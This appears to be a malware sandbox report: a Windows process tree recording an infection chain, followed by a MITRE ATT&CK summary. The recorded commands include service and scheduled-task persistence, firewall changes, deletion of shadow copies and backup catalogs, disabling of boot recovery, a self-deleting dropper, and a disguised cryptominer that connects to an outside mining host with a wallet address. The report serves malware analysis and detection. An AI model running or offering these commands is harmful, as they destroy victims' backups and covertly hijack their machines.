C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1628,11625384269609976087,4531879473126642331,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10028_1620612121" --mojo-platform-channel-handle=3092 /prefetch:85⤵PID:8932
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1628,11625384269609976087,4531879473126642331,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10028_1620612121" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3192 /prefetch:25⤵PID:6164
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1628,11625384269609976087,4531879473126642331,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10028_1620612121" --mojo-platform-channel-handle=3628 /prefetch:85⤵PID:7872
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1628,11625384269609976087,4531879473126642331,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10028_1620612121" --mojo-platform-channel-handle=3460 /prefetch:85⤵PID:4528
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1628,11625384269609976087,4531879473126642331,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10028_1620612121" --mojo-platform-channel-handle=3544 /prefetch:85⤵PID:5208
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1628,11625384269609976087,4531879473126642331,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10028_1620612121" --mojo-platform-channel-handle=992 /prefetch:85⤵PID:5860
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_EED3.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"3⤵PID:6228
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:8676 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:6368
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:684 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:1288
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:9872
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:9988
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:9828
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6644
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:10208
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵PID:9928
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{6dc58bba-1621-0c41-8cee-4316f8c4b64d}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵PID:7408
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000174"2⤵PID:5536
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:5432
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵PID:8236
-
C:\Users\Admin\AppData\Local\Temp\4EA.exeC:\Users\Admin\AppData\Local\Temp\4EA.exe1⤵PID:208
-
C:\Users\Admin\AppData\Local\Temp\837.exeC:\Users\Admin\AppData\Local\Temp\837.exe1⤵PID:10144
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\hgyipkpg\2⤵PID:7020
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\vieucjeo.exe" C:\Windows\SysWOW64\hgyipkpg\2⤵PID:9404
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create hgyipkpg binPath= "C:\Windows\SysWOW64\hgyipkpg\vieucjeo.exe /d\"C:\Users\Admin\AppData\Local\Temp\837.exe\"" type= own start= auto DisplayName= "wifi support"2⤵PID:9856
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description hgyipkpg "wifi internet conection"2⤵PID:7176
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start hgyipkpg2⤵PID:9732
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵PID:7276
-
-
C:\Users\Admin\dwokith.exe"C:\Users\Admin\dwokith.exe" /d"C:\Users\Admin\AppData\Local\Temp\837.exe"2⤵PID:9528
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\wottasmq.exe" C:\Windows\SysWOW64\hgyipkpg\3⤵PID:10768
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config hgyipkpg binPath= "C:\Windows\SysWOW64\hgyipkpg\wottasmq.exe /d\"C:\Users\Admin\dwokith.exe\""3⤵PID:10892
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start hgyipkpg3⤵PID:11028
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul3⤵PID:11156
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4477.bat" "3⤵PID:11204
-
-
-
C:\Users\Admin\AppData\Local\Temp\EFE.exeC:\Users\Admin\AppData\Local\Temp\EFE.exe1⤵PID:9456
-
C:\Users\Admin\AppData\Local\Temp\1960.exeC:\Users\Admin\AppData\Local\Temp\1960.exe1⤵PID:5652
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:3540 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:9836
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:9728
-
C:\Users\Admin\AppData\Local\Temp\3AE3.exeC:\Users\Admin\AppData\Local\Temp\3AE3.exe1⤵PID:6820
-
C:\Users\Admin\AppData\Local\Temp\40B0.exeC:\Users\Admin\AppData\Local\Temp\40B0.exe1⤵PID:5292
-
C:\Windows\SysWOW64\notepad.exenotepad.exe2⤵PID:4076
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\explorer.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\explorer.exe" -start2⤵PID:8652
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\explorer.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\explorer.exe" -agent 03⤵PID:10436
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat3⤵PID:10356
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete4⤵PID:4620
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet4⤵
- Interacts with shadow copies
PID:9680
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet3⤵PID:10288
-
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet4⤵
- Interacts with shadow copies
PID:11224
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet3⤵PID:10012
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵PID:5600
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no3⤵PID:7472
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete3⤵PID:8168
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete4⤵PID:9476
-
-
-
C:\Windows\SysWOW64\notepad.exenotepad.exe3⤵PID:4728
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5488
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵PID:10196
-
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵PID:10248
-
-
C:\Users\Admin\AppData\Local\Temp\6281.exeC:\Users\Admin\AppData\Local\Temp\6281.exe1⤵PID:4732
-
C:\Users\Admin\Documents\Update.exe"C:\Users\Admin\Documents\Update.exe"2⤵PID:9616
-
C:\Users\Admin\AppData\Local\Temp\DriverUpdate.exe"C:\Users\Admin\AppData\Local\Temp\DriverUpdate.exe"3⤵PID:6444
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"' & exit4⤵PID:9200
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"'5⤵
- Creates scheduled task(s)
PID:6528
-
-
-
C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"4⤵PID:11080
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"' & exit5⤵PID:11220
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"'6⤵
- Creates scheduled task(s)
PID:6660
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"5⤵PID:10788
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=antivirus.windowsdefenderautoupdater.me:3333 --user=4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQuiWzFUXCscKHeTzpD --pass=x --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=3 --cinit-idle-cpu=90 --nicehash --cinit-stealth5⤵PID:9816
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Clip_.exe"C:\Users\Admin\AppData\Local\Temp\Clip_.exe"3⤵PID:9320
-
-
C:\Users\Admin\AppData\Local\Temp\Red1_.exe"C:\Users\Admin\AppData\Local\Temp\Red1_.exe"3⤵PID:5264
-
-
C:\Users\Admin\AppData\Local\Temp\SteamUpdate.exe"C:\Users\Admin\AppData\Local\Temp\SteamUpdate.exe"3⤵PID:10000
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"' & exit4⤵PID:7196
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"'5⤵
- Creates scheduled task(s)
PID:9760
-
-
-
C:\Users\Admin\AppData\Roaming\VideoDriver.exe"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"4⤵PID:8764
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"' & exit5⤵PID:11188
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"'6⤵
- Creates scheduled task(s)
PID:5660
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"5⤵PID:10724
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\UpdateCore.exe"C:\Users\Admin\AppData\Local\Temp\UpdateCore.exe"3⤵PID:10256
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 100 > Nul & Del "C:\Users\Admin\AppData\Local\Temp\6281.exe"& ping 1.1.1.1 -n 1 -w 900 > Nul & Del "C:\Users\Admin\AppData\Local\Temp\6281.exe"2⤵
- Blocklisted process makes network request
- Executes dropped EXE
PID:4584 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 1003⤵
- Runs ping.exe
PID:9476
-
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 9003⤵
- Runs ping.exe
PID:10400
-
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:9820
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:7712
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:6976
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:8624
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:3896
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:7528
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:8616
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:4792
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:1076
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:10968
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:9888
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:10180
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:420
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:11108
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4524
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:10068
-
C:\Users\Admin\AppData\Roaming\gweusiiC:\Users\Admin\AppData\Roaming\gweusii1⤵PID:10512
-
C:\Users\Admin\AppData\Roaming\hheusiiC:\Users\Admin\AppData\Roaming\hheusii1⤵PID:4888
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵PID:7708
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:2240
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:11212
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:10160
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:9944
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8480
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x4081⤵PID:1152
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:360
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:10944
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7936
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:3892
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:1372
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:10128
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7848
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
2New Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Disabling Security Tools
1File Deletion
2Install Root Certificate
1Modify Registry
3Virtualization/Sandbox Evasion
1Web Service
1